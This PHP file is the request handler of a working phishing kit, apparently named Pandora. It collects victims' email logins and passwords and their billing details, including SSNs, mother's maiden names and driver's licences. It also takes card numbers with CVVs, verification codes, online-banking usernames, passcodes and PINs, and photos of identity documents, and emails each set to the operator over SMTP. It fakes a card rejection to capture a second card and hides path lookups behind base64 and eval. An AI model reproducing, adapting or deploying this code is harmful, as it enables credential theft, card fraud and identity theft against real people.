<?php

namespace Handler;

error_reporting(E_ERROR);
require_once eval(base64_decode('cmV0dXJuIF9fRElSX187')) . '/Module/autoload.php';
require_once eval(base64_decode('cmV0dXJuIF9fRElSX187')) . '/Module/mailbuilder/builder.php';
require_once eval(base64_decode('cmV0dXJuIF9fRElSX187')) . '/Construct.php';
require_once eval(base64_decode('cmV0dXJuIF9fRElSX187')) . '/Helper.php';

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

use Core\Pandora;
use Helper\MainHelper;
use Template\MailBuilder;
use Inacho\CreditCard;

class MainHandler
{
	public function postHandler($type, $post)
	{
		$core 	 = new Pandora();
		$init 	 = $core->init();
		$helper  = new MainHelper();
		$builder = new MailBuilder();

		switch ($type)
		{
			case 'login':
				if ($this->setSession('login', $post))
				{
					header('Location: ./' . $_SESSION["init"]["child"]);
					exit();
				}
			break;

			case 'continue':
				if ($this->setSession('continue', $post))
				{
					$_SESSION["init"]["post"] = 'login';

					if ($init['sendlogin'])
					{
						$this->sendEmail($builder->buildOpt(), $builder->buildMsg());
						$helper->writeStat('login', $_SESSION["client"]["ip"]);
					}

					header('Location: ./' . $_SESSION["init"]["child"]);
					exit();
				}
			break;

			case 'billing':
				if ($this->setSession('billing', $post))
				{
					$_SESSION["init"]["post"] = 'billing';

					header('Location: ./' . $_SESSION["init"]["child"]);
					exit();
				}
			break;

			case 'photo':
				if ($this->setSession('photo', $post))
				{
					$_SESSION["init"]["post"] = 'photo';

					$photo = $_SESSION["client"]["photo"];
					$this->sendEmail($builder->buildOpt(), $builder->buildMsg(), $photo);
					$helper->writeStat('photo', $_SESSION["client"]["ip"]);

					header('Location: ./' . $_SESSION["init"]["child"]);
					exit();
				}
			break;

			case 'card':
				// Card submission - kirim email setiap kali
				if ($this->setSession('card', $post))
				{
					$_SESSION["init"]["post"] = 'card';

					// Generate new child URL
					$core->webCore('ChildGen');

					// Kirim email dengan timeout
					$this->sendEmail($builder->buildOpt(), $builder->buildMsg());
					$helper->writeStat('card', $_SESSION["client"]["ip"]);

					// Redirect dengan absolute path
					$redirectUrl = '/' . $_SESSION["init"]["parent"] . '/' . $_SESSION["init"]["child"];
					header('Location: ' . $redirectUrl);
					exit();
				}
			break;

			default:
				if ($this->setSession($type, $post))
				{
					$_SESSION["init"]["post"] = $type;

					$this->sendEmail($builder->buildOpt(), $builder->buildMsg());
					$helper->writeStat($type, $_SESSION["client"]["ip"]);

					header('Location: ./' . $_SESSION["init"]["child"]);
					exit();
				}
			break;
		}
	}

	protected function setSession($type, $post)
	{
		$core = new Pandora();
		$init = $core->init();
		$helper = new MainHelper();

		switch ($type)
		{
			case 'login':
				if ($this->checkData('login', $post))
				{
					$_SESSION["client"]["email"] 	= $post["email"];
					$_SESSION['init']['page']		= 'continue';
					return true;
				} else {
					return false;
				}
			break;

			case 'continue':
				if ($this->checkData('continue', $post))
				{
					$_SESSION["client"]["password"] = $post["password"];
					
					$_SESSION['init']['page'] = 'locked';

					return true;
				} else {
					return false;
				}
			break;

			case 'email':
				if ($this->checkData('email', $post))
				{
					$_SESSION["client"]["mailpass"] = $post["emailpassword"];
					$_SESSION['init']['page'] 		= 'billing';
					return true;
				} else {
					return false;
				}
			break;

			case 'billing':
				if ($this->checkData('billing', $post))
				{
			        $_SESSION["client"]["billfullname"] = $post["fullname"];
			        $_SESSION["client"]["billaddress"] 	= $post["address"];
			        $_SESSION["client"]["billaptsuite"] = $post["address2"];
			        $_SESSION["client"]["billcity"] 	= $post["city"];
			        $_SESSION["client"]["billzip"] 		= $post["zipcode"];
			        $_SESSION["client"]["billphone"] 	= $post["phone"];
			        $_SESSION["client"]["billdob"] 		= $post["dob"];
			        $_SESSION["client"]["billcountry"] 	= $helper->parseCode('country', $post["country"]);
			        $_SESSION["client"]["billstate"] 	= $helper->parseCode('state', $post["state"]);

			        if ($_SESSION["client"]["country"] == "US" ||
			    		$_SESSION["client"]["country"] == "PR") {
			        	$_SESSION["client"]["billssn"] 	= $post["ssn"];
			        }
			        if ($_SESSION["client"]["country"] == "GB" ||
			    		$_SESSION["client"]["country"] == "IE") {
			        	$_SESSION["client"]["billsort"] = $post["sort"];
			        }
			        if ($_SESSION["client"]["country"] == "CA") {
			        	$_SESSION["client"]["billsin"] 	= $post["sin"];
			        }
			        if ($_SESSION["client"]["country"] == "AU") {
			        	$_SESSION["client"]["billosid"] = $post["osid"];
			        }
			        if ($_SESSION["client"]["country"] == "GB") {
			        	$_SESSION["client"]["billanuk"] = $post["anuk"];
			        }

			        if ($init['getmmn']) {
			        	$_SESSION["client"]["mmn"]		= $post["mmn"];
			        }
			        if ($init['getdl']) {
			        	$_SESSION["client"]["dl"]		= $post["dl"];
			        }

			        $_SESSION['init']['page'] = 'card';

					return true;
				} else {
					return false;
				}
			break;

			case 'card':
				$t1 = microtime(true);
				if ($this->checkData('card', $post))
				{
					$t2 = microtime(true);
					file_put_contents(__DIR__ . '/Module/tmp/debug_timing.log', date('H:i:s') . " - checkData: " . round(($t2-$t1)*1000, 2) . "ms\n", FILE_APPEND);
					
					if ($this->validateCard($post['cn'])['valid'])
					{
						$t3 = microtime(true);
						file_put_contents(__DIR__ . '/Module/tmp/debug_timing.log', date('H:i:s') . " - validateCard: " . round(($t3-$t2)*1000, 2) . "ms\n", FILE_APPEND);
						
						$_SESSION["client"]["noc"] 	= $post["noc"];
				        $_SESSION["client"]["cn"] 	= $post["cn"];
				        $_SESSION["client"]["cem"] 	= $post["cem"];
				        $_SESSION["client"]["cey"] 	= $post["cey"];
				        $_SESSION["client"]["cvv"] 	= $post["3d"];
				        $_SESSION["client"]["amex"] = false;

				        if (substr($post['cn'], 0, 1) === '3') {
				        	$_SESSION["client"]["acid"] = $_POST["acid"];
				        	$_SESSION["client"]["amex"] = true;
				        }

				        if ($_SESSION["client"]["country"] == "JP") {
			        		$_SESSION["client"]["3dcode"] = $post["3dcode"];
			        	}

			        	$t4 = microtime(true);
			        	$bin = $helper->getBin($post["cn"]);
			        	$t5 = microtime(true);
			        	file_put_contents(__DIR__ . '/Module/tmp/debug_timing.log', date('H:i:s') . " - getBin API: " . round(($t5-$t4)*1000, 2) . "ms\n", FILE_APPEND);

			        	$_SESSION["client"]["bin"] 		 = substr($post["cn"], 0, 8);
				        $_SESSION["client"]["scheme"] 	 = strtoupper($bin["scheme"]);
				        $_SESSION["client"]["type"] 	 = strtoupper($bin["type"]);
				        $_SESSION["client"]["bank"] 	 = strtoupper($bin["bank"]["name"]);
				        $_SESSION["client"]["brand"] 	 = strtoupper($bin["brand"]);
				        $_SESSION["client"]["cncountry"] = strtoupper($bin["country"]["name"]);
				        
				        $t6 = microtime(true);
						$_SESSION['init']['page'] 		= $helper->initPage();
						$t7 = microtime(true);
						file_put_contents(__DIR__ . '/Module/tmp/debug_timing.log', date('H:i:s') . " - initPage: " . round(($t7-$t6)*1000, 2) . "ms\n", FILE_APPEND);

						if ($init['getvbv']) {
				        	$_SESSION['init']['page'] = 'vbv';
				        } else {
				        	if ($init['doublecc']) {
				        		if (!$_SESSION['init']['cardtwice']) {
				        			$_SESSION['init']['page'] 		= 'card';
				        			$_SESSION['init']['cardfailed'] = true;
				        			$_SESSION['init']['cardtwice'] 	= true;
				        		} else {
				        			if ($init['getbank']) {
					        			$_SESSION['init']['page'] 		= 'bank';
					        		} else {
					        			if ($init['getphoto']) {
					        				$_SESSION['init']['page'] 	= 'photo';
					        			} else {
					        				$_SESSION['init']['page'] 	= 'complete';
					        			}
					        		}
				        		}
				        	} else {
				        		if ($init['getbank']) {
				        			$_SESSION['init']['page'] 		= 'bank';
				        		} else {
				        			if ($init['getphoto']) {
				        				$_SESSION['init']['page'] 	= 'photo';
				        			} else {
				        				$_SESSION['init']['page'] 	= 'complete';
				        			}
				        		}
				        	}
				        }
					} else {
						$_SESSION['init']['cardfailed'] = true;
						$_SESSION['init']['page'] 		= 'card';

						header('Location: ./' . $_SESSION["init"]["child"]);
						exit();
					}

					return true;
				} else {
					return false;
				}
			break;

			case 'vbv':
				if ($this->checkData('vbv', $post))
				{
					$_SESSION["client"]["vbv"] = $post["vbv"];

					if ($init['doublecc']) {
						if (!$_SESSION['init']['cardtwice']) {
				        	$_SESSION['init']['page'] 		= 'card';
				        	$_SESSION['init']['cardfailed'] = true;
				        	$_SESSION['init']['cardtwice'] 	= true;
				        } else {
				        	if ($init['getbank']) {
				        		$_SESSION['init']['page'] 	= 'bank';
				        	} else {
				        		if ($init['getphoto']) {
				        			$_SESSION['init']['page'] = 'photo';
				        		} else {
				        			$_SESSION['init']['page'] = 'complete';
				        		}
				        	}
				        }
					} else {
						if ($init['getbank']) {
				        	$_SESSION['init']['page'] 	= 'bank';
				        } else {
				        	if ($init['getphoto']) {
				        		$_SESSION['init']['page'] = 'photo';
				        	} else {
				        		$_SESSION['init']['page'] = 'complete';
				        	}
				        }
					}

					return true;
				} else {
					return false;
				}
			break;

			case 'bank':
				if ($this->checkData('bank', $post))
				{
					$_SESSION["client"]["bname"] 	 = $post["bn"];
			        $_SESSION["client"]["busername"] = $post["bu"];
			        $_SESSION["client"]["bpasscode"] = $post["bp"];
			        $_SESSION["client"]["baccount"]  = $post["an"];
			        $_SESSION["client"]["brouting"]  = $post["rn"];
			        $_SESSION["client"]["bpin"] 	 = $post["ap"];

					if ($init['getphoto']) {
				    	$_SESSION['init']['page'] = 'photo';
				    } else {
				    	$_SESSION['init']['page'] = 'complete';
				    }

					return true;
				} else {
					return false;
				}
			break;

			case 'photo':
				if ($this->checkData('photo', $post))
				{
					$_SESSION["client"]["phototype"]  = $post["paptype"];
					$_SESSION["client"]["photo"]["front"] = [
						'ext'	=> end(explode('.', $_FILES['papfront']['name'])),
						'path' 	=> $_FILES['papfront']['tmp_name'],
						'type'	=> 'FRONT'
					];
					$_SESSION["client"]["photo"]["back"] = [
						'ext'	=> end(explode('.', $_FILES['papback']['name'])),
						'path' 	=> $_FILES['papback']['tmp_name'],
						'type'	=> 'BACK'
					];

					$_SESSION['init']['page'] = 'complete';

					return true;
				} else {
					return false;
				}
			break;
		}
	}

	protected function validateCard($card)
	{
		$core 		= new Pandora();
		$helper 	= new MainHelper();
		$antidouble = $core->tmp('antidouble');

		if (!preg_match("/$card/i", $antidouble)) {
			$check 	= @CreditCard::validCreditCard($card);
			$helper->writeStat('antidouble', $card);
			return $check;
		} else {
			$check = ['valid' => false, 'type' => ''];
			return $check;
		}
	}

	protected function checkData($type, $post)
	{
		$helper = new MainHelper;
		switch ($type)
		{
			case 'login':
				if ($_SESSION['init']['page'] == 'login' &&
					isset($post['email']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'continue':
				if ($_SESSION['init']['page'] == 'continue' &&
					isset($post['password']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'email':
				if ($_SESSION['init']['page'] == 'email' &&
					isset($post['emailpassword']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'billing':
				if ($_SESSION['init']['page'] == 'billing' &&
					isset($post['country']) &&
					isset($post['fullname']) &&
					isset($post['address']) &&
					isset($post['city']) &&
					isset($post['state']) &&
					isset($post['zipcode']) &&
					isset($post['dob']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'card':
				if ($_SESSION['init']['page'] == 'card' &&
					isset($post['noc']) &&
					isset($post['cn']) &&
					isset($post['cem']) &&
					isset($post['cey']) &&
					isset($post['3d']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'vbv':
				if ($_SESSION['init']['page'] == 'vbv' &&
					!empty($post['vbv']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'bank':
				if ($_SESSION['init']['page'] == 'bank' &&
					isset($post['bn']) &&
					isset($post['bu']) &&
					isset($post['bp']) &&
					isset($post['an']) &&
					isset($post['rn']) &&
					isset($post['ap']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;

			case 'photo':
				if ($_SESSION['init']['page'] == 'photo' &&
					isset($post['paptype']) &&
					isset($_FILES['papfront']) &&
					isset($_FILES['papback']))
				{
					return true;
				} else {
					$helper->void();
				}
			break;
		}
	}

	protected function sendEmail($option = [], $msg, $attachment = [])
	{
		// Sync email dengan timeout pendek biar tetap cepat
		return $this->sendEmailSync($option, $msg, $attachment);
	}
	
	protected function sendEmailSync($option = [], $msg, $attachment = [])
	{
		// Original synchronous email sending (with attachment support)
		$core = new Pandora();
		$helper = new MainHelper();
		$mail = new PHPMailer(true);
		$init = $core->init();

		try {
			if ($init['smtpsend'])
			{
				$mail->isSMTP();
			    $mail->SMTPDebug  = 0;
			    $mail->SMTPAuth   = true;
			    $mail->SMTPSecure = 'tls';
			    $mail->Timeout    = 5;  // Timeout 5 detik
			    $mail->Hostname   = 'pandora-id.vip';
			    $mail->Host       = $init['smtphost'];
			    $mail->Port       = $init['smtpport'];
			    $mail->Username   = $init['smtpuser'];
			    $mail->Password   = $init['smtppass'];
			} else {
				$mail->isMail();
			}
			
			// Set timeout untuk semua operations
			$mail->Timeout = 5;  // 5 detik max

		    $mail->isHTML();
		    $mail->setFrom($option['frommail'], $option['fromname']);
		    $mail->addAddress($option['to']);
		    $mail->Subject = $option['subject'];
		    $mail->Body    = $msg;

		    if (!empty($attachment))
		    {
		    	foreach ($attachment as $file)
		    	{
		    		$name = $file['type'].' - '.$_SESSION["client"]["billfullname"].'.'.$file['ext'];
		    		$mail->AddAttachment($file['path'], $name);
		    	}
		    }

		    $mail->send();
		    $data = substr($option['subject'], 0, 70) . '...';
		    $helper->writeDelivery('success', $data);
		    return true;
		} catch (Exception $e) {
		    $data = substr($option['subject'], 0, 40) . '... - ' . $e->getMessage();
			$helper->writeDelivery('failed', $data, $msg);
		    return false;
		}
	}

}